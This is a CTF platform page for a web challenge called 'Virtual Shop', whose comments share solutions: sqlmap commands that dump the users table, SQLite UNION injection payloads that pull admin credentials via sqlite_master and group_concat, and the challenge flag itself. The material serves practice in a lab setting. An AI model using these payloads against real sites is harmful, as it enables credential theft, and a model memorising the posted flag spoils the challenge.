Virtual ShopWEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 264
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
评论
欧尼酱001 4月前

1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

回复 0
WCRH 4月前

这又不是post请求,你还保存上txt了

回复 0

.⎛⎝•̀ω•́⎠⎞. 12月前

只用sqlmap就可以做出来,很简单的一个注入

回复 0

FADogeCTF 1年前

union查询

回复 0

xiaobai568 1年前

前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了

回复 1

JJhello 1年前

sqlmap即可

回复 0

chaoge 1年前

sqlite,弄了半天认为是MySQL呢。

回复 0

justsosoloveyou 1年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1

SS3B 1年前

sqlmap一下子就出来了

回复 0

hopeinhand 1年前

联合查询注入,表名、列名、用户名全给了,都没啥好说的了

回复 0

WriteUp

image
heyile

1 金币

评分(0)

暂无评分

解题动态

梦游的小狐狸 攻破了该题 2小时前
czg9000 攻破了该题 2天前
wangif424 攻破了该题 2天前
神6107 攻破了该题 2天前
ssoocc 攻破了该题 4天前
hurt6 攻破了该题 6天前
bugku111rao 攻破了该题 12天前
EvenFrank 攻破了该题 16天前
xuci 攻破了该题 21天前
jie12306 攻破了该题 21天前
excnir 攻破了该题 21天前
fnuafhioun 攻破了该题 23天前
wangdashuai 攻破了该题 1月前
dir_tree 攻破了该题 1月前
biandanjun 攻破了该题 1月前
TOMCAT336699 攻破了该题 1月前
luogen 攻破了该题 1月前
zzhicecyb 攻破了该题 1月前
yixcjy 攻破了该题 1月前
yanzong668 攻破了该题 1月前
问题反馈